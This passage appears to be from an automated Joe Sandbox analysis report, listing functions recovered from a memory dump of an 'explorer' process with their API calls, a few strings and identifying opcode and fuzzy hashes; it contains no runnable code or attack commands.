                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                          • String ID:
                          • API String ID: 785092289-0
                          • Opcode ID: 7dd51d4a96154a47962f402dbd86dbbf85a6b52b987aef741ecd886394d83581
                          • Instruction ID: 20fb25355d1e119c807ff6e4dd84f7f4e19f7fe98668efebcd06be9cb02a5d93
                          • Opcode Fuzzy Hash: 7dd51d4a96154a47962f402dbd86dbbf85a6b52b987aef741ecd886394d83581
                          • Instruction Fuzzy Hash: 8721BA32159A80C6E73BDB18E8897DAB370F7DC749F140215D6CA96A58CB7EC455CF01
                          Function 011C29E4 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          • _lock.LIBCMT ref: 011C29F8
                            • Part of subcall function 011C0C94: _amsg_exit.LIBCMT ref: 011C0CBE
                          • fclose.LIBCMT ref: 011C2A28
                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,011C0357), ref: 011C2A4C
                          • free.LIBCMT ref: 011C2A5D
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
                          • String ID:
                          • API String ID: 594724896-0
                          • Opcode ID: aa6ca66c80873731f8a150e0b86dd53b8ef037a2e005e3ebe12fa3c1dbd2421b
                          • Instruction ID: 1bfb7aec2f355e10651e7c1b39c901f9a8250509a988cf8c3a2383f27c83dabf
                          • Opcode Fuzzy Hash: aa6ca66c80873731f8a150e0b86dd53b8ef037a2e005e3ebe12fa3c1dbd2421b
                          • Instruction Fuzzy Hash: AE115E76114A4186E6289B1DE48439CB760F7E4F88F154229DB9A437B4CF35C452C708
                          Function 011BDB44 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit$_getptd_lockfree
                          • String ID:
                          • API String ID: 2148533958-0
                          • Opcode ID: 7d5ec1c694969eec4ffcdf5f24f7f7717c51fab83522bc8814469292a1c3f9b2
                          • Instruction ID: 43d8ac5138f7c6c13c8a0e2f006cc9411e980ddced7ee909f6307b6e4d69c912
                          • Opcode Fuzzy Hash: 7d5ec1c694969eec4ffcdf5f24f7f7717c51fab83522bc8814469292a1c3f9b2
                          • Instruction Fuzzy Hash: C1114536216B8086EFAD9B95E9807E97371F798B88F48407AEB5E03764DF38C054C710
                          Function 011BAC34 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          • FlsFree.KERNEL32(?,?,?,?,011BAF69,?,?,00000000,011B994F), ref: 011BAC43
                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011BAF69), ref: 011C0B3F
                          • free.LIBCMT ref: 011C0B48
                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011BAF69), ref: 011C0B6F
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalDeleteSection$Freefree
                          • String ID:
                          • API String ID: 1250194111-0
                          • Opcode ID: 86697225af0ef29e84d7c3c26fe1ad1d26f00b65429faf76b737e405a28afc94
                          • Instruction ID: 6c274268e62b6ff2853ab336d84107eac767e9fa53a6a2195ec07a7c249c753d
                          • Opcode Fuzzy Hash: 86697225af0ef29e84d7c3c26fe1ad1d26f00b65429faf76b737e405a28afc94
                          • Instruction Fuzzy Hash: 09116539640A40C6EB1DDF19F8953987360F758FA8F5C0619FB5A072A5CB38C491C700
                          Function 011BE414 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit_getptd$_lock
                          • String ID:
                          • API String ID: 3670291111-0
                          • Opcode ID: 3e08b2e58fbf2c0528a6b76ba76d0d3e75f613e6b742c3ba148680e163a33f46
                          • Instruction ID: 2d58d4cb5de80c5e6427e467c3877f33d198bcff3feb4746dd7e092ff9d60f2f
                          • Opcode Fuzzy Hash: 3e08b2e58fbf2c0528a6b76ba76d0d3e75f613e6b742c3ba148680e163a33f46
                          • Instruction Fuzzy Hash: 5DF0F865713141C6FB1DAB65D880BEC2762EBA8B48F4D4239DA098B391DF2C8444C721
                          Function 01194140 Relevance: 6.0, APIs: 4, Instructions: 21synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: a8fae1981da01bcbb2a1c6d84720f61f8cd10c58edd704b4508c663120668e76
                          • Instruction ID: d0cd8d7fa154e2a3a6dc914eaf449be1b190e33422db320b5b29097a1bccc11a
                          • Opcode Fuzzy Hash: a8fae1981da01bcbb2a1c6d84720f61f8cd10c58edd704b4508c663120668e76
                          • Instruction Fuzzy Hash: 1DF07470601A0081FB1CAB56EC583D23260F794755F5A063DD62A46AF0CF7C86AFC340
                          Function 01191860 Relevance: 6.0, APIs: 4, Instructions: 21synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 8f51929405574940be7766fa86d43549159d96cfea42b17bcf3ff5e4809f7d9a
                          • Instruction ID: c6cec97e4a3845603700ac4d4b358c5eda88ac8b0c7dc82d9509437a0ac43f77
                          • Opcode Fuzzy Hash: 8f51929405574940be7766fa86d43549159d96cfea42b17bcf3ff5e4809f7d9a
                          • Instruction Fuzzy Hash: 6FF06274501A0481FB1CAB65EC583D57265F784765F5A067AD61B86AF0CF7C86EFC300
                          Function 011BC0B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _getptd.LIBCMT ref: 011BC0DC
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit_getptd
                          • String ID: csm$csm
                          • API String ID: 4217099735-3733052814
                          • Opcode ID: 3df88b8aebcde812e8943f6a934dd4efc34046fb34657283cbb5c52ec68e0694
                          • Instruction ID: 5f5f79975e70824590758a1eecd7de4e40a0d2c663c850ebf3c02c1dad1b1f63
                          • Opcode Fuzzy Hash: 3df88b8aebcde812e8943f6a934dd4efc34046fb34657283cbb5c52ec68e0694
                          • Instruction Fuzzy Hash: 3351AF32204681CADB3C8FAAD4C07AEBBA4F745B98F488115DF9D67B44CB38C491CB81
                          Function 011B84A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: 6d84e33dfcd121de1eafe8823227b1be611e45426ac9c9a175a7570934149db3
                          • Instruction ID: ea788ff3afb3a11d274be3388203da6fac7767088dc8905295e0d732ce064f73
                          • Opcode Fuzzy Hash: 6d84e33dfcd121de1eafe8823227b1be611e45426ac9c9a175a7570934149db3
                          • Instruction Fuzzy Hash: E1214F72B10A64C9EB1ADF75E9C07DC3BB8AB14BACF544225EF1A1BA88DB348545C710
                          Function 011C6F34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd
                          • String ID: csm$csm
                          • API String ID: 3186804695-3733052814
                          • Opcode ID: caa61915c6e2b0a0e6ed17b53c02f9c7a0b75dc161a265ff4afdc4f30caa483d
                          • Instruction ID: ec01b58352ba0250182bb5f7ea663d873aa800e5150de8f9f4c1c8979b3e25fc
                          • Opcode Fuzzy Hash: caa61915c6e2b0a0e6ed17b53c02f9c7a0b75dc161a265ff4afdc4f30caa483d
                          • Instruction Fuzzy Hash: 4721D477100644CADB298F6AD48429C3B75F368FADF8A2219EA4D0BF59CB75C890C785
                          Function 011C7034 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B8AB0: _getptd.LIBCMT ref: 011B8ABD
                            • Part of subcall function 011B8AB0: _getptd.LIBCMT ref: 011B8AD0
                          • _getptd.LIBCMT ref: 011C7095
                          • _getptd.LIBCMT ref: 011C70A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd
                          • String ID: csm
                          • API String ID: 3186804695-1018135373
                          • Opcode ID: 381a31de412e7f681f37a309b09687c868bbda3ed45e05af35985796972b0bea
                          • Instruction ID: e7e7c0693232118def57724e9fddeb3edc89d3ef20c24beff4effa37cc135b8e
                          • Opcode Fuzzy Hash: 381a31de412e7f681f37a309b09687c868bbda3ed45e05af35985796972b0bea
                          • Instruction Fuzzy Hash: BC01623A140681CACB39AF36D8903AC3365EB6AF5DF494539CA4D0F685CF71C594CB01
                          Function 01194670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegGetValueW.ADVAPI32 ref: 011946E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}
                          • API String ID: 4005939669-1494669752
                          • Opcode ID: f86ff18f124f9998448d680a47867771b16ecf497ce81cc7c4cb35a6a3ded878
                          • Instruction ID: 475d97daa368123e93db33676b05acc6815ffad59b6b0b470d6db071b563c7a7
                          • Opcode Fuzzy Hash: f86ff18f124f9998448d680a47867771b16ecf497ce81cc7c4cb35a6a3ded878
                          • Instruction Fuzzy Hash: D001F671218B8186EB64DF64F4847CAB7A4F384354F804226E6D842BA8DF7CC146CB40
                          Function 011AE590 Relevance: 5.0, APIs: 4, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFree
                          • String ID:
                          • API String ID: 2012307162-0
                          • Opcode ID: b138ba1aebf1ec8f75ee62ba587d068de580b8eb6777785ceab575a11608a321
                          • Instruction ID: f54d8abdf04a1d3349e75f7c82a9760a527605210ea91c374f0c43b5f919e3c9
                          • Opcode Fuzzy Hash: b138ba1aebf1ec8f75ee62ba587d068de580b8eb6777785ceab575a11608a321
                          • Instruction Fuzzy Hash: 4311E976529A8486D7589F15F48439ABBA0F7C8798F401529FB8E47BA8CF7CC485CF00
                          Function 011AA998 Relevance: 5.0, APIs: 4, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$CloseHandle
                          • String ID:
                          • API String ID: 2045616094-0
                          • Opcode ID: 0ad523c519bf6b0ddb911887fb408b7bb35983247c1440dd8550a25115891065
                          • Instruction ID: 0e3f5ba1191ff4ddc083953b5d8f40159d13020536920e48bb64c6f4c5c1002b
                          • Opcode Fuzzy Hash: 0ad523c519bf6b0ddb911887fb408b7bb35983247c1440dd8550a25115891065
                          • Instruction Fuzzy Hash: C7014676218B84C2DA29AF15F8943D96731F7C5B95F404529EA5E43768CF28D885CB01
                          Function 011AA9D4 Relevance: 5.0, APIs: 4, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$CloseHandle
                          • String ID:
                          • API String ID: 2045616094-0
                          • Opcode ID: 16a0aeb059cae2f3d09207e162a8b5b414ae30e5cd5292327763c3b9baa12ebb
                          • Instruction ID: 0e3f5ba1191ff4ddc083953b5d8f40159d13020536920e48bb64c6f4c5c1002b
                          • Opcode Fuzzy Hash: 16a0aeb059cae2f3d09207e162a8b5b414ae30e5cd5292327763c3b9baa12ebb
                          • Instruction Fuzzy Hash: C7014676218B84C2DA29AF15F8943D96731F7C5B95F404529EA5E43768CF28D885CB01
                          Function 011AAA21 Relevance: 5.0, APIs: 4, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$CloseHandle
                          • String ID:
                          • API String ID: 2045616094-0
                          • Opcode ID: d73eda59f30ac1fb3b0b4efd5edbe657eb2b2f8eef7f678bec99ab117ac4e254
                          • Instruction ID: 0e3f5ba1191ff4ddc083953b5d8f40159d13020536920e48bb64c6f4c5c1002b
                          • Opcode Fuzzy Hash: d73eda59f30ac1fb3b0b4efd5edbe657eb2b2f8eef7f678bec99ab117ac4e254
                          • Instruction Fuzzy Hash: C7014676218B84C2DA29AF15F8943D96731F7C5B95F404529EA5E43768CF28D885CB01
                          Function 011AD07B Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
